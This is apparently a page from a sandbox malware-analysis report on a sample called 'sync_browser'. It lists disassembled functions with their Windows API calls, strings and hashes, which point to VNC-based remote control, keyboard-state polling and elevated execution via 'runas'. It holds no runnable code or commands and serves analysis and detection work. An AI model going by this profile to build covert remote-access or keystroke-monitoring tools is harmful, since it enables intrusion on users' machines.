Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorLastValue$CurrentSleepThread_errno_invalid_parameter_noinfo
String ID: ;$;$JanFebMarAprMayJunJulAugSepOctNovDec$gfff
API String ID: 1962487656-880385205
Opcode ID: e0d79e7de24b8caf00c283af6be9bb86cffb6513b752dbb336f62d487cff5387
Instruction ID: 75e6df4305201f6c7fba7616b8605ad9bb1fa0036546112d67e6c682332945b4
Opcode Fuzzy Hash: e0d79e7de24b8caf00c283af6be9bb86cffb6513b752dbb336f62d487cff5387
Instruction Fuzzy Hash: 779106336041818BEB099E3CC4947ECBBA1D761B48F98C136DE488B796DB3DE509C762

Function 00007FF7D593CDC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 113networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FF7D593CDF5

Part of subcall function 00007FF7D593B550: inet_ntoa.WS2_32 ref: 00007FF7D593B59C
Part of subcall function 00007FF7D593B550: inet_ntoa.WS2_32 ref: 00007FF7D593B5B8
Part of subcall function 00007FF7D593B550: free.LIBCMT ref: 00007FF7D593B5CC
Part of subcall function 00007FF7D593B550: free.LIBCMT ref: 00007FF7D593B5D4
Part of subcall function 00007FF7D593B550: _wgetenv.LIBCMT ref: 00007FF7D593B60D

Part of subcall function 00007FF7D593B8C0: inet_addr.WS2_32 ref: 00007FF7D593B9C2
Part of subcall function 00007FF7D593B8C0: htons.WS2_32 ref: 00007FF7D593B9FE
Part of subcall function 00007FF7D593B8C0: socket.WS2_32 ref: 00007FF7D593BA13
Part of subcall function 00007FF7D593B8C0: connect.WS2_32 ref: 00007FF7D593BA2A

inet_addr.WS2_32 ref: 00007FF7D593CEA8
gethostbyname.WS2_32 ref: 00007FF7D593CEB6
closesocket.WS2_32 ref: 00007FF7D593CF0A
closesocket.WS2_32 ref: 00007FF7D593CF18

Strings

0123456789., xrefs: 00007FF7D593CE73

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: closesocketfreeinet_addrinet_ntoa$Startup_wgetenvconnectgethostbynamehtonssocket
String ID: 0123456789.
API String ID: 1515065793-2088042752
Opcode ID: af07b22a9e71188c15fa9fdd567796de41b23474eb50f39214d76554fd7e1c69
Instruction ID: dd55f2ce79d1f59c71139cf06d545352773261e899f21ee5f85c8c7acd69e96a
Opcode Fuzzy Hash: af07b22a9e71188c15fa9fdd567796de41b23474eb50f39214d76554fd7e1c69
Instruction Fuzzy Hash: 0D414161A45A918BFB34AB2198142FDA250AF58FACFC44232ED1D476D9EF3CE5468320

Function 00007FF7D59477C0 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 88sleepCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 00007FF7D59477E1
EnterCriticalSection.KERNEL32 ref: 00007FF7D59477F5
Sleep.KERNEL32 ref: 00007FF7D59478BA
LeaveCriticalSection.KERNEL32 ref: 00007FF7D5947950

Strings

keyEvent, xrefs: 00007FF7D5947858
start_event, xrefs: 00007FF7D594789D
stop_event, xrefs: 00007FF7D594787A

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterInitializeLeaveSleep
String ID: keyEvent$start_event$stop_event
API String ID: 2894921085-1979648887
Opcode ID: 8308cf7c3ae31cd30facc1a3198ee148bfde16ef54a6c7f1913cd50604fb2f6f
Instruction ID: 7b1da95e25991da1d960f5c7e1c4b68fbdc6dfa024689080fb1e933eaf4db7b5
Opcode Fuzzy Hash: 8308cf7c3ae31cd30facc1a3198ee148bfde16ef54a6c7f1913cd50604fb2f6f
Instruction Fuzzy Hash: AA410861E19A5782FB18BB58A454B7DAB909F85F48FC00036ED4E0A6A1DF3CA845C3B5

Function 00007FF7D5986FF0 Relevance: 10.6, APIs: 7, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D59871D0: LoadLibraryA.KERNEL32 ref: 00007FF7D5987212
Part of subcall function 00007FF7D59871D0: GetProcAddress.KERNEL32 ref: 00007FF7D598722F
Part of subcall function 00007FF7D59871D0: FreeLibrary.KERNEL32 ref: 00007FF7D598729D

EnumDisplaySettingsA.USER32 ref: 00007FF7D5987042
EnumDisplaySettingsA.USER32 ref: 00007FF7D59870AA
EnumDisplaySettingsA.USER32 ref: 00007FF7D5987112
GetSystemMetrics.USER32 ref: 00007FF7D598715A
GetSystemMetrics.USER32 ref: 00007FF7D598716B
GetSystemMetrics.USER32 ref: 00007FF7D598717C
GetSystemMetrics.USER32 ref: 00007FF7D598718D

Part of subcall function 00007FF7D59872F0: LoadLibraryA.KERNEL32 ref: 00007FF7D5987335
Part of subcall function 00007FF7D59872F0: GetProcAddress.KERNEL32 ref: 00007FF7D5987352
Part of subcall function 00007FF7D59872F0: FreeLibrary.KERNEL32 ref: 00007FF7D59873D9

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: LibraryMetricsSystem$DisplayEnumSettings$AddressFreeLoadProc
String ID:
API String ID: 3112530957-0
Opcode ID: 8e670c82803b1e3d87f37cd23dd2564999404595f46980b38d1fcce0b4863635
Instruction ID: 0309e917b3c0332de5824e282f335a88ef5fd428ea0d9960de8244f71c68769c
Opcode Fuzzy Hash: 8e670c82803b1e3d87f37cd23dd2564999404595f46980b38d1fcce0b4863635
Instruction Fuzzy Hash: 9841E8729186C18BE324DF38E44569DBBA0FB88B18F844936EF59A7749DF39D5048F20

Function 00007FF7D5983740 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF7D59E7BF0: GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF7D5983771), ref: 00007FF7D59E7BFE

GetLastError.KERNEL32 ref: 00007FF7D5983790
SetLastError.KERNEL32 ref: 00007FF7D59837B2
FormatMessageA.KERNEL32 ref: 00007FF7D59837EB
sprintf.LIBCMT ref: 00007FF7D5983804

Part of subcall function 00007FF7D59EB240: _errno.LIBCMT ref: 00007FF7D59EB258
Part of subcall function 00007FF7D59EB240: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59EB263

Part of subcall function 00007FF7D5983690: OutputDebugStringA.KERNEL32(?,?,?,?,?,00007FF7D598385F), ref: 00007FF7D59836A9
Part of subcall function 00007FF7D5983690: GetStdHandle.KERNEL32(?,?,?,?,?,00007FF7D598385F), ref: 00007FF7D59836D1
Part of subcall function 00007FF7D5983690: WriteConsoleA.KERNEL32 ref: 00007FF7D59836EE
Part of subcall function 00007FF7D5983690: WriteFile.KERNEL32(?,?,?,?,?,00007FF7D598385F), ref: 00007FF7D5983725

Strings

error code 0x%08X, xrefs: 00007FF7D59837F5
--, xrefs: 00007FF7D5983819

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorFileLastTimeWrite$ConsoleDebugFormatHandleMessageOutputStringSystem_errno_invalid_parameter_noinfosprintf
String ID: --$error code 0x%08X
API String ID: 1897734068-3878996968
Opcode ID: efd08b52188bb8304a99cb4b7993a8a97ecc2afbd75597a5911adc055181aade
Instruction ID: d0149b54aa3792a88a4e8434579d007eff210d539c47cf90ebedf45ba80bfeb7
Opcode Fuzzy Hash: efd08b52188bb8304a99cb4b7993a8a97ecc2afbd75597a5911adc055181aade
Instruction Fuzzy Hash: 9831A472A0868142EB24AB25E4107AEAB60FB85FA8FD44236EF5D477C9DF3CD4058710

Function 00007FF7D59ED58C Relevance: 10.6, APIs: 7, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00007FF7D59ED5AF
_errno.LIBCMT ref: 00007FF7D59ED5B7

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: 32eb1db604c35a1bd73017e45f5c353669c4e319d3a98b1b574dd58bb646ad4a
Instruction ID: b03f72ea3d0e39de72913f531da13f2089e4819bf075745293dc263ffef612f6
Opcode Fuzzy Hash: 32eb1db604c35a1bd73017e45f5c353669c4e319d3a98b1b574dd58bb646ad4a
Instruction Fuzzy Hash: 7A21D022A1E64247F2157F64985177DAA116F82F69FC9053BEE1C072D6CF7CA881C730

Function 00007FF7D5947220 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF7D5947249
fclose.LIBCMT ref: 00007FF7D59472CE
ShellExecuteExA.SHELL32 ref: 00007FF7D594732B

Strings

p, xrefs: 00007FF7D5947322
runas, xrefs: 00007FF7D59472E5
\uvnckeyboardhelper.exe, xrefs: 00007FF7D5947290

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExecuteFileModuleNameShellfclose
String ID: \uvnckeyboardhelper.exe$p$runas
API String ID: 3322125093-2954907143
Opcode ID: 037d2c38e5ac395d24b8413dad22403111c8ed725fed3ca7cb3e142dbe59519c
Instruction ID: b1b7598cc630aa103cc54ceeddfe68b07f99f914c970a1a0ce5ab47b5d6efbe9
Opcode Fuzzy Hash: 037d2c38e5ac395d24b8413dad22403111c8ed725fed3ca7cb3e142dbe59519c
Instruction Fuzzy Hash: E3310E31609B8286EA64AB20F4517AEB7A4FB88B54FC00137EE9D47B95DF3CD115CB20

Function 00007FF7D59EEEF8 Relevance: 10.6, APIs: 7, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00007FF7D59EEF11
_errno.LIBCMT ref: 00007FF7D59EEF19
_close_nolock.LIBCMT ref: 00007FF7D59EEF70

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: __doserrno_close_nolock_errno
String ID:
API String ID: 186997739-0
Opcode ID: 0c6e4c21da35182ad9278105eade7e0fa1460cea4b5bf11609be99456b1b247b
Instruction ID: 38aaf7adbd0c970f7dc0c8cc64e4aedc06b4e66c7c1f226402b5cd627fb289ed
Opcode Fuzzy Hash: 0c6e4c21da35182ad9278105eade7e0fa1460cea4b5bf11609be99456b1b247b
Instruction Fuzzy Hash: 2211AC22E0E28247F2053B61A84127CAA50AF81FA9FDA4A37ED1D072D6CF7CA4408334

Function 00007FF7D593A040 Relevance: 10.6, APIs: 7, Instructions: 57threadwindowCOMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A07A
GetCurrentThreadId.KERNEL32 ref: 00007FF7D593A083
GetThreadDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A08B
SetThreadDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A0A6
MessageBoxA.USER32 ref: 00007FF7D593A0B7
SetThreadDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A0C2
CloseDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A0CB

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseCurrentInputMessageOpen
String ID:
API String ID: 1973726940-0
Opcode ID: 74b4376dc008a2e3deaa89793efa6c2b5ae9ae972eae381437ecec0259b7ff16
Instruction ID: 98b63cc08b16f8b44b435256f9b2e43e049379c9774a1bebd7fccab12ab69c7d
Opcode Fuzzy Hash: 74b4376dc008a2e3deaa89793efa6c2b5ae9ae972eae381437ecec0259b7ff16
Instruction Fuzzy Hash: 22116D25B29A5187EB18BB66A44482DE6A0AF8AFE4F840036EE4E53B58CF3CD4418710

Function 00007FF7D5933E60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 56timewindowCOMMON

Download Yara Rule

APIs

SetBkMode.GDI32 ref: 00007FF7D5933E9C
SetWindowPos.USER32 ref: 00007FF7D5933ED5
KillTimer.USER32 ref: 00007FF7D5933EF3
PostQuitMessage.USER32 ref: 00007FF7D5933EFB
SetTimer.USER32 ref: 00007FF7D5933F14

Strings

d, xrefs: 00007FF7D5933EB3

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Timer$KillMessageModePostQuitWindow
String ID: d
API String ID: 3664928928-2564639436
Opcode ID: 118553bd85ce4610845fc2bc57698abad58593aa61c72bc6e801eda45dbd9551
Instruction ID: b4f531f7abd7286012d27f6162fb465c9424166ce5d9b8567298e154e29e921e
Opcode Fuzzy Hash: 118553bd85ce4610845fc2bc57698abad58593aa61c72bc6e801eda45dbd9551
Instruction Fuzzy Hash: AC11C4A2E5861387F7647B38A41463DA690AF85BA5FC44231CD1A466E4DF3CD885C720

Function 00007FF7D594A6F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetWindowLongPtrA.USER32 ref: 00007FF7D594A71A
SetWindowLongPtrA.USER32 ref: 00007FF7D594A752
SetDlgItemTextA.USER32 ref: 00007FF7D594A767
SetForegroundWindow.USER32 ref: 00007FF7D594A770
EndDialog.USER32 ref: 00007FF7D594A785

Strings

Oct 1 2014 21:43:49, xrefs: 00007FF7D594A758

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Window$Long$DialogForegroundItemText
String ID: Oct 1 2014 21:43:49
API String ID: 2747855613-2751236551
Opcode ID: 9a61f633431cb37e218c1f842c908c6751c059a7ba695ef3b628182b3906ce08
Instruction ID: a471d034317777dba6aa02116cba2052bec7e2c30e1a68f084003b2000a12aa9
Opcode Fuzzy Hash: 9a61f633431cb37e218c1f842c908c6751c059a7ba695ef3b628182b3906ce08
Instruction Fuzzy Hash: 73119331A18B5287E324AB26A58457EA762FF85FD4FD84132DE8A07B98CF3CD841C714

Function 00007FF7D5981550 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47keyboardCOMMON

Download Yara Rule

APIs

GetAsyncKeyState.USER32 ref: 00007FF7D5981561
MapVirtualKeyA.USER32 ref: 00007FF7D59815BA
GetAsyncKeyState.USER32 ref: 00007FF7D59815D3

Strings

down, xrefs: 00007FF7D598158A
vnckeymap.cpp : new state %d (%s), xrefs: 00007FF7D59815D9
vnckeymap.cpp : setshiftstate %d - (%s->%s), xrefs: 00007FF7D5981591

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: AsyncState$Virtual
String ID: down$vnckeymap.cpp : new state %d (%s)$vnckeymap.cpp : setshiftstate %d - (%s->%s)
API String ID: 2891131044-1915745809
Opcode ID: af929e24d0095cd63bb2d8a54ee9630447cb1a074a3e2900237919080e080432
Instruction ID: 903f05ca0449c45f69abae7aa09c070b297a39781c1a0dfe2951f1632a921f0d
Opcode Fuzzy Hash: af929e24d0095cd63bb2d8a54ee9630447cb1a074a3e2900237919080e080432
Instruction Fuzzy Hash: 61119321B28AA2C7EA146F15F4005AEAB61FFC4B49FC80432ED8E47665CF3DD915C760

Function 00007FF7D5947FB0 Relevance: 10.5, APIs: 7, Instructions: 46synchronizationCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7D5947FC9
ResetEvent.KERNEL32 ref: 00007FF7D5947FE6
